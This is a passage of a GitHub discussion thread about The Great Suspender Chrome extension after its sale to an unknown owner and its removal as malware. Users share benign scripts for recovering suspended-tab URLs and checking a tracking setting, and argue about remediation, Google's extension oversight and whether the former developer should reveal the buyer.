nobody knows for sure whether passwords or other private data were actually compromised or not.</p> <p>I may or may not have opted out of tracking. I wasn't sure and as the extension is currently deactivated and I have no intention of activating it isn't exactly simple to find out. But I managed to find out and here is how:</p> </blockquote> <blockquote> <p>In my case, I obviously didn't opt out, unfortunately.</p> </blockquote> <p>I had no idea I could even opt in or out of anything. Or that ownership had even changed.<br /> It's a shame this was a problem in November, and most of the userbase and media found out yesterday, but It's not as easy to spread this alert, I suppose</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/40576482?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="LewisSpring picture"> <strong>LewisSpring</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>You don't have to go through nearly all those hoops to export and import your old session data. You don't need to run any additional javascript, etc. This can all be accomplished with built-in export and import procedures for the extension:</p> <ol> <li>Quit Chrome</li> <li>Disable your Internet connection</li> <li>Open Chrome and re-enable the Bad version of TGS</li> <li>Open your Extensions panel, and open the Details of the Bad version of TGS</li> <li>Click Extension Options</li> <li>Click Session Management</li> <li>Export your most recent session (session.txt)</li> <li>Disable the Bad version of TGS</li> <li>Quit Chrome</li> <li>Renable your Internet connection</li> <li>Start Chrome</li> <li>Open Chrome, open your Extensions panel, and open the Details of the Good version of TGS (installed it from GitHub, etc)</li> <li>Click Extension Options</li> <li>Click Session Management</li> <li>Click Import Session</li> <li>Select your exported session,txt file</li> </ol> </blockquote> <p>This worked very well, and I think is the easiest way forward.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54349?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="YoungElPaso picture"> <strong>YoungElPaso</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I wrote a modification to TGS to migrate suspended tabs from other extension ids: <a rel="nofollow noopener" target="_blank" href="https://github.com/aciidic/thegreatsuspender-notrack/pull/3">https://github.com/aciidic/thegreatsuspender-notrack/pull/3</a></p> <p>Note it won't migrate settings, sessions, or whatever else.</p> <p>Additionally, my personal Gentoo overlay (<code>layman -a luke-jr</code>) now has a package to build and install a system-wide TGS 7.1.6. The migration patch is available as a USE flag. It generates a private key on first install and stores it in /etc/portage for reuse with rebuilds/possible upgrades.</p> <p>All of this is as-is, and I do not guarantee any maintenance or support for them.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">5</span> ❤<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>This works as intended in both Chrome and Brave browsers without any modification to code. Hope it doesn't get buried among all the comments and someone finds use for their lost urls.<br /> Thanks to @minig0d<br /> For the non-tech savy folks, after Step 2, right click anywhere and select inspect. Now select "Console" in the developer window which opened. You have to paste the above code in this section.</p> </blockquote> <p>Thx! To me truly this is the easiest way... I mean literally takes 30 seconds to do and requires no installing anything, or reactivating malicious extensions or anything. I know it looks a little scary because of that long helper function (but it was quicker that figuring out the actual shadowRoots... but to make it less intimidating, here's a shorter version:</p> <p>Step 1: go to <a rel="nofollow noopener" target="_blank" href="chrome://history/">chrome://history/</a><br /> Step 2: paste the following into the search box to filter history to only show items from TGS: chrome-<a rel="nofollow noopener" target="_blank" href="extension://klbibkeccnjlkjkiokjodocebajanakg">extension://klbibkeccnjlkjkiokjodocebajanakg</a><br /> Step 3: Open the DevTools Console (press F12 to open DevTools) and switch to the console tab at the top)<br /> Step 4: Paste the following and hit enter:</p> <pre><code class="prettyprint">let urls = ""; document .querySelector("#history-app") .shadowRoot.querySelector("#history") .shadowRoot.querySelectorAll("[role=row]") .forEach((r) => { let l = r.shadowRoot.querySelector("#link"); if (l.href) urls += l.href.replace(/^chrome.*?uri=/, "") + "\n"; }); console.log(urls); copy(urls); </code></pre> <p>The script will:<br /> 1) spit out all the urls, one per line, without needing to do any modifications and<br /> 2) copy them to the windows clipboard so that you can paste the list in notepad or another tab manager or wherever you'd like!</p> <p>EDIT: See below if you want a version which will also open all the urls for you :)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@liwo</strong> </p> <blockquote> <pre><code class="prettyprint">$ mkdir db $ cp -a ~/.config/google-chrome/Default/Sync\ Extension\ Settings/klbibkeccnjlkjkiokjodocebajanakg/* db/ $ pip install leveldb $ python >>> import leveldb >>> db = leveldb.LevelDB('db') >>> db.Get(b'trackingOptOut') bytearray(b'false') </code></pre> </blockquote> <p><code>b'trackingOptOut'</code> doesn't exist in my version 😕 </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5769148?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="munael picture"> <strong>munael</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>This really is nano defender all over again, seriously, what is it with the smartest open source devs, making the most fucking dipshit transfer decisions.<br /> This just proves that, if any project changes ownership, abandon ship till the new owners are proven trustworthy.</p> </blockquote> <p>Man, I've used this for years and didn't even know it changed owners - probably the same as many many other people.</p> </blockquote> <p>that's the thing, the change wasn't ever announced at Google Chrome store<br /> generally i see this as failure of Google as they need some safety net for any large user-base extension<br /> e.g. >100k users (or > 1 million) change of ownership must be announced and code reviews are mandatory </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1688458?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Dwarden picture"> <strong>Dwarden</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">9</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><code>b'trackingOptOut'</code> doesn't exist in my version</p> </blockquote> <p>@munael<br /> You can list the keys in the database with <code>[x[0] for x in db.RangeIter()]</code>, maybe you find a different key for tracking opt out? That's how I found <code>b'trackingOptOut'</code></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/904704?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="liwo picture"> <strong>liwo</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>OK for the heck of it I also converted to use the new JS sets (which will eliminate any duplicate urls) and added in opening all the links back up... this worked for me in a quick test but the opening up may not work depending on popup blocker settings and such... Same instructions as the previous versions...</p> <p>WARNING: if you have a LOT of tabs it may take a while to open them all, use a lot of memory, may even crash chrome... use at your own risk.</p> <p>Step 1: go to <a rel="nofollow noopener" target="_blank" href="chrome://history/">chrome://history/</a><br /> Step 2: paste the following into the search box to filter history to only show items from TGS: chrome-<a rel="nofollow noopener" target="_blank" href="extension://klbibkeccnjlkjkiokjodocebajanakg">extension://klbibkeccnjlkjkiokjodocebajanakg</a><br /> Step 3: Open the DevTools Console (press F12 to open DevTools) and switch to the console tab at the top)<br /> Step 4: Paste the following and hit enter:</p> <pre><code class="prettyprint">let urlSet = new Set(); document .querySelector("#history-app") .shadowRoot.querySelector("#history") .shadowRoot.querySelectorAll("[role=row]") .forEach((r) => { urlSet.add(r.shadowRoot.querySelector("#link")?.href.replace(/^chrome.*?uri=/, "")); }); let urlStr = [...urlSet].join("\n"); // DELETE THE FOLLOWING LINE IF YOU DON'T WANT TO OPEN EACH LINK IN A NEW TAB urlSet.forEach((url) => window.open(url, "_blank")); // DELETE THE FOLLOWING LINE IF YOU DON'T WANT IT TO LIST ALL THE URLS IN THIS CONSOLE console.log(urlStr); // DELETE THE FOLLOWING LINE IF YOU DON'T WANT TO COPY ALL THE URLS TO THE CLIPBOARD (SO THEY CAN BE PASTED SOMEWHERE) copy(urlStr); </code></pre> <p>This will:<br /> 1) spit out all the urls, one per line, without needing to do any modifications<br /> 2) copy them to the windows clipboard so that you can paste the list in notepad or another tab manager or wherever you'd like!<br /> 3) attempt to open each url in a new tab for you</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Hello folks,</p> <p>I’m left with some significant questions and concerns from what I’m reading and was hoping some folks could help me better understand the situation. I’m definitely not a developer- so pardon if these are relatively naive questions. I feel they are important for less adept users, like myself.</p> <p>I realize that the Chrome Web Store version that affected so many of us is not the version here on GitHub. Additionally, I do understand that we likely don’t have all the answers to everything right now. That being said, here’s what I’m wondering:</p> <p>1) It seems the community has determined TGS had code which appeared to be for analytics, but in fact, may have had an ulterior motive and was loading scripts from an external source. Is this correct? What do we know and what don’t we know about this? What’s the takeaway one should have right now?</p> <p>2) I don’t know how Chrome extensions fully work. Are they sandboxed? Can they break outside of Chrome and infect the machine as a whole? Is that a potential concern here? For example, in the scenario we are dealing with- could a theoretical keylogger or other malware still be present on the system after removing the extension/uninstalling Chrome? Or would a potential exploit be strictly contained within Chrome only? Or is this an unknown? What’s likely the case here?</p> <p>3) What is the proper precautionary remedies one should take for this situation? Should I be reformatting my machines which had it, if possible? Is uninstalling Chrome enough? Should I manually delete specific local files? Is simply removing the extension enough? Are we unsure? Regardless, I’ve gathered that it seems to be a good call to change passwords and sign out of existing login sessions on affected machines. What else should someone do? Additionally, what are the absolute safest things someone can do in response to this event?</p> <p>4) I know someone affected with a Chromebook, another with a Mac, and also Ubuntu and Windows 10 machines. Does the platform change the remedies needed, at all? Are any of these platforms more or less resilient to a Chrome vulnerability like this?</p> <p>Thank you everybody for the hard work on this and for reading my questions.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/78621714?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="tophtophtoph64 picture"> <strong>tophtophtoph64</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>change of ownership must be announced</p> </blockquote> <p><strong>@Dwarden</strong> how exactly do you suggest doing this? there is absolutely <strong>no way</strong> to detect this thing reliably. I can tell you my password right now and Google would never know. On the one hand you're blaming Google, but on the other you have not provided any way to solve this. Blaming companies for not solving unsolvable problems gets us nowhere.</p> <p>Some ideas which were suggested here:</p> <ul> <li><a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-756039230 - hard linking the extension distribution to github, to prevent non-open-source updates</li> <li><a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-773629292 - a dedicated place for the current owner to notify users of acquisition, instead of a blog post</li> </ul> <p>I don't see these ideas giving much benefit, but if you have other ideas I'd love to hear. (I don't know how to tell google about them tho)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26556598?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotWearingPants picture"> <strong>NotWearingPants</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@tophtophtoph64</strong> Hello, I'll try my best:</p> <ol> <li>Yes, read my comment here <a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender/discussions/13#discussioncomment">https://github.com/gioxx/MarvellousSuspender/discussions/13#discussioncomment</a>-341015 which summarizes the gist of things.</li> <li>The things that they can do are limited to the permissions they ask from the user. As you can read in this other comment <a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender/discussions/13#discussioncomment">https://github.com/gioxx/MarvellousSuspender/discussions/13#discussioncomment</a>-341016 - with the permissions they had, they could have taken over the entire computer and break out of Chrome. As to what's likely, idk. My guess is that the doomsday scenario of escaping Chrome didn't happen, and the worst they did was steal logins. Maybe they didn't do anything at all 🤷‍♂️ </li> <li>As per the doomsday scenario, I guess there's no way to be 100% safe. I think changing passwords and signing out of sessions is the best sane solution. The absolute safest thing doesn't exist, they could have stolen your bank details, so you need to switch banks now. There's no limit here, I think the passwords is where we should stop.</li> <li>The OS only affects the probabilities of them escaping Chrome, and I'd say the less common your OS is - the less chance they escaped. But again, my guess is this scenario didn't happen, so the OS doesn't make a difference.</li> </ol> <p>Sorry I didn't have good answers to 3 & 4, but I hope this helps. Our priority now should be figuring out who this owner is, and what he knows about the analytics he added. Then we can hopefully be more smart about this situation.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26556598?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotWearingPants picture"> <strong>NotWearingPants</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@tophtophtoph64</strong> Hello, I'll try my best:</p> <pre><code class="prettyprint">1. Yes, read my comment here [gioxx#13 (comment)](https://github.com/gioxx/MarvellousSuspender/discussions/13#discussioncomment-341015) which summarizes the gist of things. 2. The things that they can do are limited to the permissions they ask from the user. As you can read in this other comment [gioxx#13 (comment)](https://github.com/gioxx/MarvellousSuspender/discussions/13#discussioncomment-341016) - with the permissions they had, they could have taken over the entire computer and break out of Chrome. As to what's likely, idk. My guess is that the doomsday scenario of escaping Chrome didn't happen, and the worst they did was steal logins. Maybe they didn't do anything at all 🤷‍♂️ 3. As per the doomsday scenario, I guess there's no way to be 100% safe. I think changing passwords and singing out of sessions is the best sane solution. The absolute safest thing doesn't exist, they could have stolen your bank details, so you need to switch banks now. There's no limit here, I think the passwords is where we should stop. 4. The OS only affects the probabilities of them escaping Chrome, and I'd say the less common your OS is - the less chance they escaped. But again, my guess is this scenario didn't happen, so the OS doesn't make a difference. </code></pre> <p>Sorry I didn't have good answers to 3 & 4, but I hope this helps. Our priority now should be figuring out who this owner is, and what he knows about the analytics he added. Then we can hopefully be more smart about this situation.</p> </blockquote> <p>Thank you so much for some clear answers to my questions!</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/78621714?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="tophtophtoph64 picture"> <strong>tophtophtoph64</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>change of ownership must be announced</p> </blockquote> <p><strong>@Dwarden</strong> how exactly do you suggest doing this? there is absolutely <strong>no way</strong> to detect this thing reliably. I can tell you my password right now and Google would never know. On the one hand you're blaming Google, but on the other you have not provided any way to solve this. Blaming companies for not solving unsolvable problems gets us nowhere.</p> <p>Some ideas which were suggested here:</p> <ul> <li><a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-756039230">#1263 (comment)</a> - hard linking the extension distribution to github, to prevent non-open-source updates</li> <li><a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-773629292">#1263 (comment)</a> - a dedicated place for the current owner to notify users of acquisition, instead of a blog post</li> </ul> <p>I don't see these ideas giving much benefit, but if you have other ideas I'd love to hear. (I don't know how to tell google about them tho)</p> </blockquote> <p>it's simple any large-popular extensions will need to have real person or company behind it, not random anonymous ghost<br /> same does apply to any trust-able opensource anyway ... </p> <p>and like i clearly said, the changes apply both to ownership and code changes </p> <p>typical example is google automatically pushing updates for extensions ... sooner or later way worse things gunna happen</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1688458?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Dwarden picture"> <strong>Dwarden</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>What is the time period that the extension presented a vulnerability? Did it present a vulnerability up until Google forcibly deactivated it? </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/29931390?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="jwildman16 picture"> <strong>jwildman16</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>generally i see this as failure of Google as they need some safety net for any large user-base extension<br /> e.g. >100k users (or > 1 million) change of ownership must be announced and code reviews are mandatory</p> </blockquote> <p>I think this was a double sided failure...</p> <p>From Google's side, for simply allowing any extension to execute remote js from any website without even providing that information (which website were being connected and why) on the extension page; and making sure any changes on that list were listed and had to be agreed upon installing new versions.<br /> A simple whitelisting of domains of urls on the manifest would do I believe. Any other domains not listed on the manifest would be blocked.<br /> Also for the webrequest editing there could be some sort of internal audit tool, some log written for each extension doing this where we could inspect exactly what changes were done to the request and when.</p> <p>From the Open Source side, the ability of disavowing or blacklisting/quarantine somehow a project when this sort of shady thing happens. I've tried to wrap my head at what would be a legitimate reason for a stealth anonymous acquisition of an O.S project. If this was indeed a company of some repute, then it would've been trackable somehow; not payed by bitcoin and kept dark and in silence. Supporting OS software is always good publicity for companies - see how the approach changed a bit how we view MS (with vs code and github). There's very little to lose on disclosing this information especially <strong>after</strong> the business is concluded and if the project is meant to be kept open source - which, given the licensing model of this, had to keep being unless they did a substantial rewrite. Only reason for not divulging it was if it were a competing software acquiring it to kill the competition - which again doesn't make sense seeing they kept updating it.<br /> Given this was an individual that never introduced himself, hadn't a github or similar track neither a bio; and had to purchased a high profile chrome extension to contribute to it... the red flags were all there. The community should've been able to blacklist this project and google should've reacted to it, freezing further updates on the chrome store until the new contributor was peer reviewed.</p> <p>I honestly have a hard time believing the idea that the buyer was malicious didn't cross the original developer's mind as soon as he got an offer.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3511099?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="tcvv picture"> <strong>tcvv</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> ❤<span class="ml-2 mr-3">6</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>What is the time period that the extension presented a vulnerability? </p> </blockquote> <p>IIRC mine updated to the malware version back in October.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I don't know why but a few minutes ago TGS somehow got reactivated. I then noticed it, disabled it, and removed it once and for all. Just thought I'd mention that. Currently working on making a Pseudorandom password generator to change all my passwords.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/57839984?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Laff70 picture"> <strong>Laff70</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@deanoemcke</strong> you have an ethical obligation to reveal the identity of the new maintainer. YOU ARE RESPONSIBLE FOR THIS. In fact it seems entirely possible <strong>@deanoemcke</strong> lied about selling the extension to an "unknown third party" and is in fact running it himself with the intent to spread malware and profit from it. Is there any evidence to the contrary, that this was a legitimate sale with some sort of NDA? If <strong>@deanoemcke</strong> continues to refuse to provide the identity of the new maintainer, he should be treated within the open source community as a malicious bad actor himself.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2007008?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dismantl picture"> <strong>dismantl</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">7</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@dismantl</strong> The legitimate approach to getting the malware author's identity is to sue a John Doe and subpoena @deanoemcke. Until someone does that, it isn't clear that <strong>@deanoemcke</strong> has any obligation to disclose.</p> <p>IANAL (but if I were <strong>@deanoemcke</strong>, I'd be talking to one...)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@dismantl</strong> The legitimate approach to getting the malware author's identity is to sue a John Doe and subpoena @deanoemcke. Until someone does that, it isn't clear that <strong>@deanoemcke</strong> has any obligation to disclose.</p> <p>IANAL (but if I were <strong>@deanoemcke</strong>, I'd be talking to one...)</p> </blockquote> <p>What is so hard to understand simple reasoning? It is illegal to publish any personal information. It has nothing to do with disclosure. At least in Europe we have laws to protect people identify on the internet. THE END.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">1</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>What is so hard to understand simple reasoning? It is illegal to publish any personal information. It has nothing to do with disclosure. At least in Europe we have laws to protect people identify on the internet. THE END.</p> </blockquote> <p>Lol no it's not. Cite your sources.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2007008?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dismantl picture"> <strong>dismantl</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>What is so hard to understand simple reasoning? It is illegal to publish any personal information. It has nothing to do with disclosure. At least in Europe we have laws to protect people identify on the internet. THE END.</p> </blockquote> <p>Lol no it's not. Cite your sources.</p> </blockquote> <p><a rel="nofollow noopener" target="_blank" href="https://europa.eu/youreurope/citizens/consumers/internet-telecoms/data-protection-online-privacy/index_en.htm">https://europa.eu/youreurope/citizens/consumers/internet-telecoms/data-protection-online-privacy/index_en.htm</a></p> <p>Without the agreement of the person of the personal data (name, birthday, home adresse, ect), it is forbidden and a crime to publish any private data of the person online. That is even normal reasoning.</p> <p>Example in Germany: <a rel="nofollow noopener" target="_blank" href="https://www.datenschutz.eu/urteile/Amtsgericht-Marburg-20060601/">https://www.datenschutz.eu/urteile/Amtsgericht-Marburg-20060601/</a></p> <p>"The unauthorized publication of personal data on the Internet that is not generally accessible with the intention of harming another is a criminal offense"</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">4</span> 😄<span class="ml-2 mr-3">2</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@makedir</strong> :)<br /> Yeah I thought you would pull GDPR out of your sleeve ;)<br /> The problem is that it is a regulation "against" companies, enterprises or any commercial entity... No person can be hold liable on data exposure using this regulation...</p> <p>And generally speaking, this new developer has broke the GDPR by putting an explicit Opt-in for tracking.. i.e. collects information without the user consent, without stating why he needs that, for what he will use it and till when he will keep that info...<br /> The problem is... in this case it is a person probably...<br /> Or if you want to take legal actions by filing a complaint... you first have to prove this is a company...<br /> Of course in some EU countries local police and prosecutor offices can take a complaint and start investigation against unknown perpetrator..... which means the first person they will contact is the former developer...<br /> But this option is too vague, long time resulted etc...</p> <p>Anyway I am sure someone will file a proper complaint where needed and the former developer will have real troubles :)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/870612?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="PhobosK picture"> <strong>PhobosK</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Yeah I thought you would pull GDPR out of your sleeve ;)<br /> The problem is that it is a regulation "against" companies, enterprises or any commercial entity... No person can be hold liable on data exposure using this regulation...</p> </blockquote> <p>That is total BS. I gave another example of German law. Every normal country has a law like that. Any publish of personal data is a crime, even if I go outside on the street and publish personal data by someone like name street ect and is like "this person is a criminal". That is a crime.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <blockquote> <p>What is so hard to understand simple reasoning? It is illegal to publish any personal information. It has nothing to do with disclosure. At least in Europe we have laws to protect people identify on the internet. THE END.</p> </blockquote> <p>Lol no it's not. Cite your sources.</p> </blockquote> <p><a rel="nofollow noopener" target="_blank" href="https://europa.eu/youreurope/citizens/consumers/internet-telecoms/data-protection-online-privacy/index_en.htm">https://europa.eu/youreurope/citizens/consumers/internet-telecoms/data-protection-online-privacy/index_en.htm</a></p> <p>Without the agreement of the person of the personal data (name, birthday, home adresse, ect), it is forbidden and a crime to publish any private data of the person online. That is even normal reasoning.</p> <p>Example in Germany: <a rel="nofollow noopener" target="_blank" href="https://www.datenschutz.eu/urteile/Amtsgericht-Marburg-20060601/">https://www.datenschutz.eu/urteile/Amtsgericht-Marburg-20060601/</a></p> <p>"The unauthorized publication of personal data on the Internet that is not generally accessible with the intention of harming another is a criminal offense"</p> </blockquote> <p>Irrelevant. GDPR is about the collection, storage, processing, and reuse of personal data by an online service. From the text:</p> <blockquote> <p>[...] situations where a company or an organisation is allowed to collect or reuse your personal information:</p> <p>they have a contract with you – for example, a contract to supply goods or services (i.e. when you buy something online), or an employee contract<br /> ...<br /> when there are legitimate interests – for example, if your bank uses your personal data to check whether you'd be eligible for a savings account with a higher interest rate</p> </blockquote> <p>There is absolutely nothing illegal about publishing the name of a person with which you make a contract, such as Dean claims he did.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2007008?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dismantl picture"> <strong>dismantl</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">2</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>Yeah I thought you would pull GDPR out of your sleeve ;)<br 